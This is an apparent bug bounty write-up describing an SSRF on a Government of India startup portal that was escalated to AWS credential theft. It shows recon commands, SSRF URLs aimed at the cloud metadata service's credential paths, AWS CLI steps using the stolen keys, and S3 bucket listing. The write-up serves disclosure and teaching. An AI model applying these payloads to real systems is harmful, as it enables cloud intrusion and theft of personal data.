Open in app

Sign in

Write

Sign in

Exposing Millions of Investor and Startup Register details and PII INFO in STARTUPINDIA (Govt of INDIA).

Santosh Kumar Sha (@killmongar1996)
6 min readDec 24, 2021

Hi, everyone

My name is Santosh Kumar Sha, I’m a security researcher from India(Tinsukia, Assam). In this article, I will be describing how I was able to access million of startup register details by SSRF aws metadata exploitation.

I am now offering 1:1 sessions to share my knowledge and expertise:

topmate.io/santosh_kumar_sha

SPECIAL COVID-19 Note:

As pandemics is not over. Please follow covid norms as we how devastating it was, So please take care of yourself and your surround individuals. Special request to my fellow bug-bounty hunter Take care of your health .

TOOLS used for the exploitation

1. Subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau(Corben) — https://github.com/lc/gau

4. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls.

What is Startup India Government program:

Startup India is an initiative of the Government of India. The campaign was first announced by Indian Prime Minister, Narendra Modi during his speech in 15 August 2015. The action plan of this initiative is focusing on three areas: Simplification and Hand-holding. Funding Support and Incentives.

Startup India Scheme is an initiative by the Government of India for generation of employment and wealth creation. The goal of Startup India is the development and innovation of products and services and increasing the employment rate in India

Story Behind the bug:

This is the write of my Recent bug that i found . So I was doing some research with my friend for register for a Startup then stated the reading the information on https://www.startupindia.gov.in/ came across a url while reading and browsing the link ,So I was I was doing recon for gathering all urls from internet archives using waybackurls and gau. So started fuzzing the for ssrf vulnerability and found one but there was some filtering going on behind the server which not allow me access the internal metadata but i bypass the waf to access the internal AWS metadata.

Here it goes:

Suppose we assume the target name is example.com where every thing is in-scope like this:

In-scope : *.startupindia.gov.in

To gather all the urls from internet archives i have used waybackurls tool and gau.

Command used:

gau -subs startupindia.gov.in

waybackurls startupindia.gov.in

So the chance of missing the urls still exist so in-order to be ahead of the game I don’t want to miss any urls for testing so I used subfinder and pipe to waybackurls to get all the urls for all the subdomain if exist and save it to a file.

So the final command will look like this:

gau -subs startupindia.gov.in >> vul1.txt

waybackurls startupindia.gov.in >> vul2.txt

subfinder -d startupindia.gov.in -silent | waybackurls >> vul3.txt

Now, we have collected all the urls ,so its times to resolve all the urls to filter out the dead urls from the list and filter out all the urls containing parameter for testing for vulnerability. So the command look like this below

cat vul1.txt vuln2.txt vul3.txt | grep “=” | sort -u | grep “?” | httpx -silent -http-proxy http://127.0.0.1:8080

After Collecting all the urls I proxy all the request to go through my burp suite and While It was going in background I quickly created an “Match and Replace” utility using burp suite for replacing any query parameter with my burp collaborator payload.

As all The thing were step up,now i starting browsing the the startupindia.gov.in by clicking each and every link and endpoint and by burp was replacing any query parameter with burp payload .

Now I finally got an hit on my burp collaborator server with http and dns request with urls as

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://burpcollabrator.net&details=xxxxx

So that to fuzzing further to get AWS internal metadata for the vulnerable domain like these:

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://169.254.169.254/

I tried the above url it gives me 200 OK, but I was surprise with the output as there was no waf/firewall to block me from get internal data access.

So the final ssrf vulnerable url it look like this and the result was a shocker to me. I finally got access to aws metadata to startupindia below is the url for it.

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://169.254.169.254/latest/meta-data/

Now The actual Process start how I got to access to Millions of Investor and Startup Register details and PII INFO in STARTUPINDIA:

So Now I decided for Escalating SSRF for maximum impact .

Grabbing the aws metadata by ssrf :

  1. To get [AccessKeyId, SecretAccessKey, Token]

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/XXXXXX

MY REACTION after SEEING this …..

2) Now to get [instanceId, accountId, region] .The item to keep in mind is "region": "ap-south-1". Now check the presence of security credentials. These credentials will lead us to the access to production server.

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://169.254.169.254/latest/dynamic/instance-identity/document

To check if the credentials are usable we are going to use the AWS CLI. For the next commands, use the data from the above request and the region value we retrieved before ("ap-south-1").

$ export AWS_ACCESS_KEY_ID="[AccessKeyId]"
$ export AWS_SECRET_ACCESS_KEY="[SecretAccessKey]"
$ export AWS_DEFAULT_REGION="[region]"
$ export AWS_SESSION_TOKEN="[Token]"

Now it’s time to check the identity of the token.

$ aws sts get-caller-identity{
    "UserId": "Axxxxxxxxxxxxxxxxx:i-xxxxxxxxxxxxxxxxx",
    "Account": "XXxxxxxxxxxx",
    "Arn": "arn:aws:sts::19xxxxxxxxxx:XXXX/XXXXXX/i-xxxxxxxxxxxxxxxxx"
}

Now I just run the simple aws command in terminal to get all list of aws instances. Command used was:

aws s3 ls

Command list of aws instances and in that there was “XXXXXX” aws instance so I decided to check it out. So again I was aws cli.

aws s3 ls s3://XXXXXX

And i was able to access all list user backup info file so be in safe side I already took the permission for further escalation.

I quickly reported the bug and in the next day the report was triage to critical

TimeLine:

Nov 27, 2021, 12:25 AM: Reported

Nov 27, 2021, 12:35 PM: A ticket was assigned.

Dec 22, 2021: The issue was resolved (retested)

Dec 22, 2021: Acknowledged by STARTUP INDIA.

Takeaway:

I’m sure that a lot of security researcher had already see there process but this how I approach to bypass the firewall to get AWS metadata accessed through SSRF aws metadata .So never stop when across any filtration or firewall or WAF because there are way to way them and always try to escalate bug to increase the impact for higher bounties.

That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.

Thanks for reading :)
Stay Safe.

Santosh Kumar Sha - Security Researcher - Bugcrowd | LinkedIn

View Santosh Kumar Sha's profile on LinkedIn, the world's largest professional community. Santosh Kumar has 2 jobs…

www.linkedin.com

https://twitter.com/killmongar1996

Pentesting
Ethical Hacking
Hacking
Hackerone
Bug Bounty

--

--

Santosh Kumar Sha (@killmongar1996)

Written by Santosh Kumar Sha (@killmongar1996)

2K Followers

Cloud Security |Security Researcher |Pentester | Bugbounty hunter|VAPT | Pentration tester | CTF player | topmate.io/santosh_kumar_sha

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams